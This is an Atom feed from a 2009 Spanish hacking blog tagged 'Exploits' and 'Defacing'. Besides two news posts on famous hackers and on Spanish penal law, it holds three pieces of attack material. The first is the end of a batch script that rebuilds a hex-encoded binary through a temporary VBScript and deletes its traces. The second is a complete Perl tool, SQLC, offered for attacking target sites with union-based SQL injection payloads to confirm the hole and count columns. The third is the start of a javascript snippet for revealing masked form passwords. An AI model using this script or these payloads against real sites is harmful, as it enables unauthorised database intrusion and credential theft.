href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"A5F4FEF5E7FBFB7F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 15Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;Cscript /Nologo t.vbs &gt; "binario.ex_"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/del.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Del&lt;/span&gt;&lt;/a&gt; /f /q /a t.vbs &gt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt; 2&gt;&amp;amp;1&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;Expand -r binario.ex_ &gt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt; &lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/del.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Del&lt;/span&gt;&lt;/a&gt; /f /q /a binario.ex_ &gt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt; &lt;/div&gt; &lt;!-- END TEMPLATE: bbcode_highlight --&gt;&lt;br /&gt;Un saludo hermanos! &lt;img src="http://foro.latinohack.com/images/smilies/action-smiley-030.gif" alt="" title="Action Smiley 030" class="inlineimg" border="0" /&gt;&lt;img src="http://foro.latinohack.com/images/smilies/bud.gif" alt="" title="Bud" class="inlineimg" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-8952234293335861225?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/8952234293335861225/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-sql-copy-column-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/8952234293335861225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/8952234293335861225'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-sql-copy-column-by-xassiz.html' title='[Tool] SQL Copy Column  -  by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-4401149171700251774</id><published>2009-12-20T03:43:00.000-08:00</published><updated>2009-12-20T06:35:43.804-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Perl'/><category scheme='http://www.blogger.com/atom/ns#' term='Blind SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>[Tool] SQLC (SQL Columnator)  -  by xassiz</title><content type='html'>&lt;div class="post" id="msg_781848"&gt;&lt;div align="center"&gt;&lt;span style=";font-family:courier new;color:red;"  &gt;&lt;b&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 0);font-family:verdana;" &gt;SQLC (SQL Columnator) - by xassiz&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://xasscapturas.webcindario.com/Aplicaciones/SQLC1.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style="font-family: verdana;"&gt;SQLC&lt;/b&gt;&lt;span style="font-family:verdana;"&gt; es mi herramienta en Perl, capaz de devolverte el número de columnas de una web, luego de comprobar si realmente es vulnerable.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Un ejemplo de su uso:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://xasscapturas.webcindario.com/Aplicaciones/SQLC2.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Aquí teneis el código:&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;if (!$ARGV[0]) {&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;print q (&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      .d8888.  .d88b.  db       .o88b.&lt;br /&gt;      88'  YP .8P  Y8. 88      d8P  Y8&lt;br /&gt;     `8bo.    88    88 88      8P &lt;br /&gt;       `Y8b.  88    88 88      8b &lt;br /&gt;     db   8D  `8P  d8' 88booo. Y8b  d8&lt;br /&gt;     `8888Y'   `Y88'Y8 Y88888P  `Y88P'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;             [+] Modo de uso:&lt;br /&gt;&lt;br /&gt;perl SQLC.pl http://www.target.com/news.php?id=&lt;br /&gt;&lt;br /&gt;       -------------------------------&lt;br /&gt;&lt;br /&gt;              Coded by xassiz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;exit 1;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;print q (&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      .d8888.  .d88b.  db       .o88b.&lt;br /&gt;      88'  YP .8P  Y8. 88      d8P  Y8&lt;br /&gt;     `8bo.    88    88 88      8P &lt;br /&gt;       `Y8b.  88    88 88      8b &lt;br /&gt;     db   8D  `8P  d8' 88booo. Y8b  d8&lt;br /&gt;     `8888Y'   `Y88'Y8 Y88888P  `Y88P'&lt;br /&gt;&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;$target = $ARGV[0];&lt;br /&gt;&lt;br /&gt;print("\n [+] Website a atacar: $target \n\n");&lt;br /&gt;print("\n [?] Comprobando vulnerabilidad \n");&lt;br /&gt;&lt;br /&gt;$vulnerabilidad = LWP::UserAgent-&gt;new() or die;&lt;br /&gt;$comprobacion = $vulnerabilidad-&gt;get($target."-1+union+select+69--");&lt;br /&gt;&lt;br /&gt;if ($comprobacion-&gt;content =~ /The used SELECT statements have a different number of columns/ || $comprobacon-&gt;content =~ /You have an error in your SQL syntax/ || $comprobacion-&gt;content =~ /mysql_fetch/ || $comprobacion-&gt;content =~ /mysql_num_rows/ || $comprobacion-&gt;content =~ /MySQL/)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;print("\n [+] Objetivo Vulnerable \n\n\a");&lt;br /&gt;print("\n [?] Buscando numero de columnas \n");&lt;br /&gt;&lt;br /&gt;$count = 2;&lt;br /&gt;$max = 500;&lt;br /&gt;&lt;br /&gt;$precolumnator = LWP::UserAgent-&gt;new() or die;&lt;br /&gt;$precolumns = $vulnerabilidad-&gt;get($target."-1+union+select+0x78617373697a--");&lt;br /&gt;&lt;br /&gt;if ($precolumns-&gt;content =~ /xassiz/)&lt;br /&gt;{&lt;br /&gt;print("\n [+] La website tiene 1 columna \n\n\a");&lt;br /&gt;&lt;br /&gt;exit 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;$inject = ",0x78617373697a";&lt;br /&gt;&lt;br /&gt;while ($count &lt;= $max) {  $columnator = LWP::UserAgent-&gt;new() or die;&lt;br /&gt;$columns = $vulnerabilidad-&gt;get($target."-1+union+select+0x78617373697a".$inject."--");&lt;br /&gt;&lt;br /&gt;if ($columns-&gt;content =~ /xassiz/)&lt;br /&gt;{&lt;br /&gt;print("\n [+] La website tiene $count columnas \n\n\a");&lt;br /&gt;exit 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;$inject = $inject.",0x78617373697a";&lt;br /&gt;$count ++;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;print("\n [-] No se encontro el numero de columnas \n\n\a");&lt;br /&gt;exit 1;&lt;br /&gt;&lt;br /&gt;} else {&lt;br /&gt;&lt;br /&gt;print("\n [-] Objetivo No Vulnerable \n\n\a");&lt;br /&gt;&lt;br /&gt;exit 1;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#Autor = xassiz;&lt;br /&gt;#Blog  = xassiz.blogspot.com;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Espero que os guste amigos!  Saludos &lt;/span&gt;&lt;img style="font-family: verdana;" src="http://foro.latinohack.com/images/smilies/action-smiley-033.gif" alt="" border="0" /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-4401149171700251774?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/4401149171700251774/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-sqlc-sql-columnator-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4401149171700251774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4401149171700251774'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-sqlc-sql-columnator-by-xassiz.html' title='[Tool] SQLC (SQL Columnator)  -  by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-3597833200267756733</id><published>2009-12-02T13:09:00.000-08:00</published><updated>2009-12-02T13:11:00.095-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hackers'/><title type='text'>Los diez hackers más famosos del mundo</title><content type='html'>&lt;div style="font-family: verdana;" class="cnt_text clearfix"&gt; &lt;p&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;Los hombres más peligrosos de la Red. Una lista con los diez nombres de los hackers más famosos del mundo ha sido elaborada por el periódico británico &lt;i&gt; &lt;a href="http://www.telegraph.co.uk/technology/6670127/Top-10-most-famous-hackers.html" target="_blank"&gt;'The Telegraph'&lt;/a&gt; &lt;/i&gt;.  Algunos han hecho colapsar miles y miles de servidores, otros han fabricado míticos virus con los que infectaron millones de carpetas de usuarios de todo el planeta. La lista la encabeza el hacker más famoso de su generación, Kevin Mitnick, que después de cumplir cinco años de prisión asesora a las empresas de informática en el sector de la seguridad.&lt;/b&gt;&lt;/p&gt; &lt;p&gt;El Departamente de Justicia de EEUU describe a Mitnick como el "criminal más buscado de la historia de Estados Unidos y aunque parezca una exageración su curriculum &lt;b&gt;es amplio en actos vandálicos en Internet&lt;/b&gt;.&lt;/p&gt; &lt;p&gt;Mitnick &lt;b&gt;atentó contra sistemas informáticos de empresas como Nokia, Fujitsu y Motorola&lt;/b&gt;. Fue arrestado en 1995 y tras su confesión llegó a un acuerdo para cumplir prisión durante cinco años.&lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;div class="box_simplephoto"&gt;&lt;img class="" src="http://www.telecinco.es/informativos/content/contentpage/130.$plit/C_4_contentpage_100012574_description_1.jpg" alt="" title="" /&gt;&lt;/div&gt;&lt;br /&gt;(&lt;i&gt;Mitnik, el primero de izq a derecha, seguido por Kevin Poulson, Robert Tappan Morris,Stephen Wozniak y David L Smith, creador del virus Melissa&lt;/i&gt;) &lt;p&gt;En el año 2000 salió en libertad bajo palabra y desde entonces no habla de su pasado en el hampa virtual y &lt;b&gt;se dedica a la consultoría como asesor de seguridad informática. &lt;/b&gt; &lt;/p&gt; &lt;p&gt;El segundo de estos ciberdelincuentes con fama de altruistas es Kevin Poulson, que ganó su fama tras &lt;b&gt;bloquear las líneas telefónicas de la estación de radio Kiss-FM &lt;/b&gt;de Los Angeles y &lt;b&gt;ganar el premio del concurso radial &lt;/b&gt;que era un Porsche. &lt;/p&gt; &lt;p&gt;Los investigadores se pusieron tras la pista de Poulson, después de que este 'hackeara'  una base de datos del FBI.  &lt;b&gt;No pudieron pillarlo y en los programas de televisión &lt;/b&gt;aparece como fugitivo de misterios sin resolver.  Ahora se dedica al periodismo. &lt;/p&gt; &lt;p&gt;Adrian Lamo, &lt;b&gt;más conocido como el 'hacker sintecho'&lt;/b&gt;, actuaba desde bares, locutorios e internet cafés. Su mayor heroicidad fue introducirse en la intranet del New York Times y agregar su nombre a una lista de expertos del periódico. &lt;/p&gt; &lt;p&gt;Como si fuera una profesión recurrente, Lamos ha terminado trabajando como periodista.&lt;/p&gt; &lt;p&gt;Stephen Wozniak, también estadounidense, también un cincuentón que durante sus años de universitario se dedicó al 'hackeo' de las líneas telefónicas que &lt;b&gt;le permitía a él a sus amigos hacer llamadas de larga distancia sin pagar&lt;/b&gt;.&lt;/p&gt; &lt;p&gt;De ahí su prestigio y su fama en el mundo de los hackers. Terminó fundando la compañía Apple junto a Steve Jobs.&lt;/p&gt; &lt;p&gt;Loyd Blankenship, &lt;b&gt;más conocido como 'El Mentor'&lt;/b&gt;, era miembro del grupo hacker 'Legion of Doom', que se enfrentaba a Masters of Deception. Es el &lt;b&gt;autor del manifiesto hacker &lt;/b&gt;-La conciencia de un hacker- que escribió luego de ser detenido en 1986, y del código para el juego del rol Ciberpunk. Ahora se dedica a la programación de videojuegos.&lt;/p&gt; &lt;p&gt;Michael Calce se ubica en el sexto puesto de la lista y &lt;b&gt;se dedicaba a dejar fuera de servicio los portales de compra-venta más grandes del mundo.  &lt;/b&gt; &lt;/p&gt; &lt;p&gt; &lt;b&gt;Eso fue lo que hizo en el 2000 c&lt;/b&gt;on eBay, Amazon y Yahoo que sufrieron sus ataques. Fue atrapado y condenado a uso limitado de Internet.&lt;/p&gt; &lt;p&gt;Robert Tappan Morris &lt;b&gt;creó un virus informático en noviembre de 1988 &lt;/b&gt;con el que inutilizó unos 6.000 ordenadores de la empresa UNIX y provocó daños por millones de dólares. Fue uno de los primeros virus de ese tipo.&lt;/p&gt; &lt;p&gt;Pero tras cumplir tres años de llibertad condicional y cientos de horas de trabajo a la comunidad dejó el mundo marginal para dedicarse a la enseñanza universitaria.&lt;/p&gt; &lt;p&gt;El octavo puesto de la lista lo ocupa un grupo no identificado que se conocen con el nombre de &lt;b&gt;'Masters of deception'&lt;/b&gt;. Viven en Nueva York y &lt;b&gt;se especializaron en 'hackear'  el sistema telefónico &lt;/b&gt;de EEUU en los años 80.&lt;/p&gt; &lt;p&gt;El grupo actualmente &lt;b&gt;está desarticulado &lt;/b&gt;después de que varios de &lt;b&gt;sus miembros fueran arrestados &lt;/b&gt;y tuvieran que cumplir sentencias de cárcel. &lt;/p&gt; &lt;p&gt;El penúltimo puesto es para &lt;b&gt;David L. Smith&lt;/b&gt;, del que mucho conocerán por &lt;b&gt;el virus Melissa&lt;/b&gt;, su maligna creación. Fue el primer virus creado para infectaro correos electrónicos.&lt;/p&gt; &lt;p&gt;Smith fue arrestado y &lt;b&gt;cumplió sentencia por causar daños por valor de 80 millones de dólares&lt;/b&gt;.&lt;/p&gt; &lt;p&gt;Cierra la lista, &lt;b&gt;Sven Jaschan, que en 2004 cuando era todavía un adolescente creó el virus Sasser&lt;/b&gt;, que afectaba directamente a los ordenadores con sistema Windows. Sus vecinos lo delataron para conseguir la recompensa de Microsoft.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt; &lt;/div&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;:P&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Saludos ;)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-3597833200267756733?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/3597833200267756733/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/12/los-diez-hackers-mas-famosos-del-mundo.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/3597833200267756733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/3597833200267756733'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/12/los-diez-hackers-mas-famosos-del-mundo.html' title='Los diez hackers más famosos del mundo'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-2693514238256648847</id><published>2009-11-30T06:17:00.000-08:00</published><updated>2009-11-30T06:19:00.914-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>[Noticia] El término “hackers” excluido del derecho penal español</title><content type='html'>&lt;br&gt;&lt;!-- BEGIN TEMPLATE: ad_showthread_firstpost_start --&gt;  &lt;!-- END TEMPLATE: ad_showthread_firstpost_start --&gt; &lt;span style="font-family: verdana;"&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-family: verdana;"&gt;El nuevo proyecto de código penal español que preparan en el Ministerio de Justicia excluye el término “hackers” del texto. Una rectificación que hace justicia al tradicionalmente experto en seguridad informática o “persona que disfruta de un conocimiento profundo del funcionamiento interno de un sistema, en particular de computadoras y redes informáticas”, confundido errónea y comúnmente como el criminal informático por excelencia. &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; La noticia, difundida desde el Bufet Almeida hará justicia a la injusticia, para unos tipos que generalmente aportan seguridad a la inseguridad de ordenadores y redes y/o mejoras a sistemas y aplicaciones poniéndolas a disposición del dominio público. &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Un término confundido desde medios –especialmente generalistas- y gran público con los “crackers” y también por el legislador, que hasta ahora lo crucifica como el delincuente informático que expresa nuestro código penal actual. &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Como dicen desde el Bufet Almeida “algo habrán aprendido sobre Internet los nuevos inquilinos del Ministerio de Justicia”. El hacker no será ya por defecto, sinónimo de un delincuente.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;span style="font-size:85%;"&gt;Fuente: theinquirer.es&lt;/span&gt;&lt;br /&gt;&lt;/div&gt; &lt;/blockquote&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Ahora esperemos a que esto se alargue a otros países de Latino América :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Saludos!! :D&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-2693514238256648847?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/2693514238256648847/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/11/noticia-el-termino-hackers-excluido-del.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/2693514238256648847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/2693514238256648847'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/11/noticia-el-termino-hackers-excluido-del.html' title='[Noticia] El término “hackers” excluido del derecho penal español'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-4289270421769681298</id><published>2009-11-28T05:13:00.000-08:00</published><updated>2009-11-28T05:16:09.532-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Asteriscos'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>[Firefox] Como saber que hay bajo los asteriscos</title><content type='html'>&lt;br&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Pues cuando hay una pagina con contraseñas, y aparecen ocultas bajo asteriscos, con este tip podemos averiguarlas al momento.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Solo tenemos que ejecutar un codigo javascript en la direccion, y nos saltará automaticamente un alert con el contenido de la pass :)&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; El codigo es este:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- BEGIN TEMPLATE: bbcode_php --&gt; &lt;div style="margin: 5px 20px 20px;"&gt;    &lt;div class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;   &lt;code style="white-space: nowrap;"&gt;    &lt;!-- php buffer start --&gt;&lt;code&gt;&lt;span style="color:#000000;"&gt; &lt;span style="color:#0000bb;"&gt;javascript&lt;/span&gt;&lt;span style="color:#007700;"&gt;:(function(){var &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;s&lt;/span&gt;&lt;span style="color:#007700;"&gt;,&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;F&lt;/span&gt;&lt;span style="color:#007700;"&gt;,&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;j&lt;/span&gt;&lt;span style="color:#007700;"&gt;,&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;f&lt;/span&gt;&lt;span style="color:#007700;"&gt;,&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;; &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;s &lt;/span&gt;&lt;span style="color:#007700;"&gt;= &lt;/span&gt;&lt;span style="color:#dd0000;"&gt;""&lt;/span&gt;&lt;span style="color:#007700;"&gt;; &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;F &lt;/span&gt;&lt;span style="color:#007700;"&gt;= &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;document&lt;/span&gt;&lt;span style="color:#007700;"&gt;.&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;forms&lt;/span&gt;&lt;span style="color:#007700;"&gt;; 